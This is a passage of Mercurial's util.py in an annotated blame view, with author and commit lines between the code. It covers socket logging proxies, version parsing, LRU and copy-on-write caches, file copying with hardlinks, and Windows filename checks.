        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
Gregory Szorc
util: add a file object proxy that can notify observers...
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object.

    ``fh`` is wrapped in a ``fileobjectproxy`` whose observer writes to
    ``logh`` under the prefix ``name``; the remaining arguments are
    passed to the observer unchanged.
    """
    return fileobjectproxy(
        fh,
        fileobjectobserver(logh, name, reads=reads, writes=writes,
                           logdata=logdata, logdataapis=logdataapis))
Gregory Szorc
util: observable proxy objects for sockets...
class socketobserver(baseproxyobserver):
    """Logs socket activity.

    Each method receives the result of the observed socket call as
    ``res`` followed by the arguments of that call.
    """

    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        """Remember the log handle ``fh``, the ``name`` prefix and flags.

        ``reads`` / ``writes`` / ``states`` select which kinds of calls
        are logged, ``logdataapis`` controls the per-call API line and
        ``logdata`` controls whether the payload is logged.
        """
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # socket.send() returns the number of bytes sent (an integer), so
        # it is formatted directly; calling len() on it raises TypeError.
        # The API line is also only written when logdataapis is set, like
        # every other data-carrying method here, so _writedata() never
        # has to continue a line that should not have been started.
        if self.logdataapis:
            self.fh.write('%s> send(%d, %d) -> %d' % (
                self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return
            # value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # socket.sendto() accepts (data, address) or
        # (data, flags, address). In the two-argument form the second
        # positional argument is the address, not the flags.
        if address is None:
            flags = 0
            address = flagsoraddress
        else:
            flags = flagsoraddress

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        # socket.gettimeout() returns None when no timeout is set, which
        # cannot be formatted with %f.
        if res is None:
            self.fh.write('%s> gettimeout() -> None\n' % (self.name,))
        else:
            self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
Gregory Szorc
util: observable proxy objects for sockets...
r37028
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket.

    ``fh`` is wrapped in a ``socketproxy`` whose observer writes to
    ``logh`` under the prefix ``name``; the remaining arguments are
    passed to the observer unchanged.
    """
    return socketproxy(
        fh,
        socketobserver(logh, name, reads=reads, writes=writes,
                       states=states, logdata=logdata,
                       logdataapis=logdataapis))
Matt Mackall
refactor version code...
def version():
    """Return version information if available.

    Falls back to ``'unknown'`` when the ``__version__`` module cannot be
    imported.
    """
    try:
        # Both the import and the attribute access stay inside the try
        # block, exactly as before.
        from . import __version__ as versionmod
        found = versionmod.version
    except ImportError:
        found = 'unknown'
    return found
Gregory Szorc
util: add versiontuple() for returning parsed version information...
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()

    # Up to three dot-separated numeric components, an optional '+' or
    # '-' separator, then whatever is left.
    matched = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if matched:
        vparts = matched.group(1)
        # An empty remainder is reported as None.
        extra = matched.group(2) if matched.group(2) else None
    else:
        # Nothing numeric at the start: the whole string is "extra".
        vparts, extra = '', v

    vints = []
    for piece in vparts.split('.'):
        try:
            number = int(piece)
        except ValueError:
            break
        vints.append(number)

    # (3, 6) -> (3, 6, None)
    vints.extend([None] * (3 - len(vints)))
    major, minor, patch = vints[0], vints[1], vints[2]

    if n == 2:
        return (major, minor)
    if n == 3:
        return (major, minor, patch)
    if n == 4:
        return (major, minor, patch, extra)
Brendan Cully
Add cachefunc to abstract function call cache
def cachefunc(func):
    '''cache the result of function calls

    Returns a wrapper around ``func`` that remembers results per
    positional-argument value. Keyword arguments are not handled.
    '''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # A one-slot list is enough: there is only a single result.
        slot = []

        def f():
            if not slot:
                slot.append(func())
            return slot[0]

        return f

    results = {}

    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in results:
                results[arg] = func(arg)
            return results[arg]

        return f

    def f(*args):
        if args not in results:
            results[args] = func(*args)
        return results[args]

    return f
Jun Wu
config: use copy-on-write to improve copy performance...
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        outstanding = getattr(self, '_copied', 0)
        if not outstanding:
            return self
        # One outstanding cheap copy is resolved by handing the caller a
        # real copy of its own.
        self._copied = outstanding - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = 1 + getattr(self, '_copied', 0)
        return self
Martin von Zweigbergk
util: rewrite sortdict using Python 2.7's OrderedDict...
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Remove any existing entry first so that re-setting a key moves
        # it to the end of the ordering.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            pairs = src.iteritems() if isinstance(src, dict) else src
            for k, v in pairs:
                self[k] = v
Jun Wu
config: use copy-on-write to improve copy performance...
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    copy() returns the same object; a real copy is only made by a later
    preparewrite() call, as the examples below show.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.

    Combines the ``cow`` helper with ``sortdict``; it adds no methods of
    its own.
    """
Martin von Zweigbergk
util: add base class for transactional context managers...
class transactional(object):
    """Base class for making a transactional type into a context manager.

    Leaving the ``with`` block calls ``close()`` only when no exception
    was raised, and always calls ``release()``.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            # Runs even if close() itself raised.
            self.release()
Martin von Zweigbergk
histedit: extract InterventionRequired transaction handling to utils...
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if tr:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            # Intervention is not a failure: keep what was done so far,
            # then let the exception continue to the caller.
            tr.close()
            raise
        finally:
            tr.release()
    else:
        yield
Durham Goode
rebase: use one dirstateguard for when using rebase.singletransaction...
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing and yields ``None``."""
    yield None
Gregory Szorc
util: reimplement lrucachedict...
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value', u'cost')

    def __init__(self):
        # A fresh node is unlinked and starts out in the "empty" state.
        self.next = self.prev = None
        self.markempty()

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0
Gregory Szorc
util: reimplement lrucachedict...
r27371
Siddharth Agarwal
util: add an LRU cache dict...
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        """Create an empty cache.

        ``max`` is stored as ``capacity``, the number of list nodes the
        cache may grow to. ``maxcost`` is the total cost limit; a falsy
        value disables cost enforcement.
        """
        # Maps key -> node holding that key.
        self._cache = {}

        # The list starts as a single empty node linked to itself.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        # Number of nodes in the linked list (empty nodes included).
        self._size = 1

        self.capacity = max
        # Sum of the costs of all entries currently stored.
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        """Return the value for ``k`` and mark the entry as newest.

        Raises KeyError if ``k`` is not in the cache.
        """
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        # Plain item assignment inserts with the default cost of 0.
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        """Remove ``k`` from the cache and return its value.

        If ``k`` is missing, ``default`` is returned when one was given;
        otherwise the KeyError propagates.
        """
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        """Return the value for ``k``, or ``default`` if it is missing.

        Goes through __getitem__(), so a hit also marks the entry as
        newest.
        """
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        """Remove all entries; the linked list nodes are kept for reuse."""
        n = self._head
        # Walk from the head until the first empty node, emptying each
        # node on the way.
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        # Falsy arguments fall back to this instance's settings.
        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry, or
        None if the cache is empty.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        """Evict the oldest entries while the total cost is over the limit.

        Does nothing when the cache holds at most one entry or the total
        cost is within ``maxcost``. Otherwise entries are removed, oldest
        first, until the total cost drops to 75% of ``maxcost`` or only
        one entry is left.
        """
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
Gregory Szorc
util: teach lrucachedict to enforce a max total cost...
r39604
Matt Mackall
fix memory usage of revlog caches by limiting cache size [issue1639]
def lrucachefunc(func):
    '''cache most recent results of function calls

    Results are remembered per positional-argument value. Once more than
    20 results are held, the least recently used one is dropped before a
    new result is stored.
    '''
    results = {}
    # Keys ordered from least to most recently used.
    recency = collections.deque()

    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in results:
                recency.remove(arg)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[arg] = func(arg)
            recency.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                recency.remove(args)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[args] = func(*args)
            recency.append(args)
            return results[args]

    return f
Matt Mackall
util: take propertycache from context.py
class propertycache(object):
    '''descriptor that computes an attribute once and stores it on the object

    The wrapped function is called with the instance on attribute access
    and its result is written into the instance ``__dict__`` under the
    function's name.
    '''

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
Pierre-Yves David
clfilter: add a propertycache that must be unfiltered...
r18013
Mark Thomas
util: add util.clearcachedproperty...
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set

    ``prop`` is converted to a native string before it is looked up in
    ``obj.__dict__``; a missing entry is silently ignored.
    '''
    obj.__dict__.pop(pycompat.sysstr(prop), None)
Brendan Cully
templater: return data in increasing chunk sizes...
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max

    Pieces from ``source`` are accumulated until their combined length
    reaches the current threshold, then emitted joined together. Whatever
    is left over when ``source`` is exhausted is emitted as a final chunk.
    '''
    def floorlog2(value):
        # index of the highest set bit; zero maps to zero
        return value.bit_length() - 1 if value else 0

    pending = []
    pendinglen = 0
    for piece in source:
        pending.append(piece)
        pendinglen += len(piece)
        if pendinglen < min:
            continue
        if min < max:
            # next threshold: double it, or jump to the largest power of
            # two not above what was just collected, capped at max
            grown = min << 1
            pow2 = 1 << floorlog2(pendinglen)
            if pow2 > grown:
                grown = pow2
            if grown > max:
                grown = max
            min = grown
        yield ''.join(pending)
        pending = []
        pendinglen = 0
    if pending:
        yield ''.join(pending)
Matt Mackall
many, many trivial check-code fixups
def always(fn):
    '''predicate that accepts every argument'''
    return True
def never(fn):
    '''predicate that rejects every argument'''
    return False
Bryan O'Sullivan
Get add and locate to use new repo and dirstate walk code....
r724
Pierre-Yves David
util: add a 'nogc' decorator to disable the garbage collection...
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            result = func(*args, **kwargs)
        finally:
            # only turn the collector back on if it was on when we started
            if wasenabled:
                gc.enable()
        return result
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
Alexis S. L. Carvalho
pass repo.root to util.pathto() in preparation for the next patch
def pathto(root, n1, n2):
    '''return the relative path from one place to another.

    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path exists
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    src = splitpath(n1)
    dst = n2.split('/')
    # count the leading components both paths share
    shared = 0
    limit = min(len(src), len(dst))
    while shared < limit and src[shared] == dst[shared]:
        shared += 1
    climb = ['..'] * (len(src) - shared)
    return pycompat.ossep.join(climb + dst[shared:]) or '.'
Bryan O'Sullivan
Fix walk code for files that do not exist anywhere, and unhandled types....
r884
Mads Kiilerich
util: introduce datapath for getting the location of supporting data files...
# the location of data files matching the source code
if not procutil.mainfrozen() or getattr(sys, 'frozen', None) == 'macosx_app':
    datapath = os.path.dirname(pycompat.fsencode(__file__))
else:
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)

i18n.setdatapath(datapath)
Matt Mackall
dispatch: generalize signature checking for extension command wrapping
def checksignature(func):
    '''wrap a function with code to check for calling errors

    A TypeError whose traceback is exactly one frame deep was raised by
    the call itself, so it is reported as error.SignatureError. Any
    deeper TypeError is re-raised unchanged.
    '''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            depth = len(traceback.extract_tb(sys.exc_info()[2]))
            if depth != 1:
                raise
            raise error.SignatureError
    return check
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 # a whilelist of known filesystems where hardlink works reliably
Martin von Zweigbergk
cleanup: use set literals...
r32291 _hardlinkfswhitelist = {
Augie Fackler
util: whitelist apfs for hardlink support...
r37400 'apfs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'btrfs',
'ext2',
'ext3',
'ext4',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'hfs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'jfs',
Matt Harbison
util: whitelist NTFS for hardlink creation (issue4580)
r35529 'NTFS',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'reiserfs',
'tmpfs',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'ufs',
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575 'xfs',
Jun Wu
util: enable hardlink for some BSD-family filesystems...
r31598 'zfs',
Martin von Zweigbergk
cleanup: use set literals...
r32291 }
Jun Wu
util: disable hardlink for copyfile if fstype is outside a whitelist...
r31575
FUJIWARA Katsunori
util: make copyfile avoid ambiguity of file stat if needed...
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the stat of the file we are about to replace
            oldstat = filestat.frompath(dest)
        unlink(dest)

    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype in _hardlinkfswhitelist:
            try:
                oslink(src, dest)
            except (IOError, OSError):
                pass # fall back to normal copy
            else:
                return

    if os.path.islink(src):
        # copystat is ignored for symlinks, but in general it isn't needed
        # for them anyway
        os.symlink(os.readlink(src), dest)
        return

    try:
        shutil.copyfile(src, dest)
        if copystat:
            # copystat also copies mode
            shutil.copystat(src, dest)
        else:
            shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    bumped = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(dest, (bumped, bumped))
    except shutil.Error as inst:
        raise error.Abort(str(inst))
Matt Mackall
util: add copyfile function
r3629
Martin von Zweigbergk
copystore: use progress helper...
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible.

    When ``hardlink`` is None it is decided by comparing the device of the
    source (the directory itself, or the parent directory of a file) with
    the device of the destination's parent directory. If ``progress`` is
    given, its topic is set and it is incremented once per file.

    Returns a ``(hardlink, num)`` pair: whether hardlinking is still in
    use after this call, and the number of files processed.
    """
    num = 0
    isdir = os.path.isdir(src)

    if hardlink is None:
        probe = src if isdir else os.path.dirname(src)
        hardlink = (os.stat(probe).st_dev ==
                    os.stat(os.path.dirname(dst)).st_dev)
    if progress:
        progress.topic = _('linking') if hardlink else _('copying')

    if isdir:
        os.mkdir(dst)
        for name, kind in listdir(src):
            child = os.path.join(src, name)
            target = os.path.join(dst, name)
            hardlink, copied = copyfiles(child, target, hardlink, progress)
            num += copied
        return hardlink, num

    linked = False
    if hardlink:
        try:
            oslink(src, dst)
            linked = True
        except (IOError, OSError):
            # don't try linking again for the remaining files
            hardlink = False
    if not linked:
        shutil.copy(src, dst)
    num += 1
    if progress:
        progress.increment()

    return hardlink, num
Adrian Buehlmann
util.copyfiles: don't try os_link() again if it failed before...
r11254
Gregory Szorc
util: use set for reserved Windows filenames...
r34054 _winreservednames = {
'con', 'prn', 'aux', 'nul',
'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
Adrian Buehlmann
util: rename _windows_reserved_filenames and _windows_reserved_chars
r14262 _winreservedchars = ':*?"<>|'
Adrian Buehlmann
path_auditor: check filenames for basic platform validity (issue2755)...
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    components = path.replace('\\', '/').split('/')
    for comp in components:
        if not comp:
            continue
        for ch in _filenamebytestr(comp):
            if ch in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % ch
            if ord(ch) < 32:
                # control characters
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(ch)
        # reserved device names apply to the part before the first dot
        stem = comp.partition('.')[0]
        if stem and stem.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % stem
        last = comp[-1:]
        # '.' and '..' themselves are fine
        if last in '. ' and comp not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % last
Jun Wu
codemod: use pycompat.iswindows...
# Prefer time.perf_counter whenever the interpreter provides it. It is
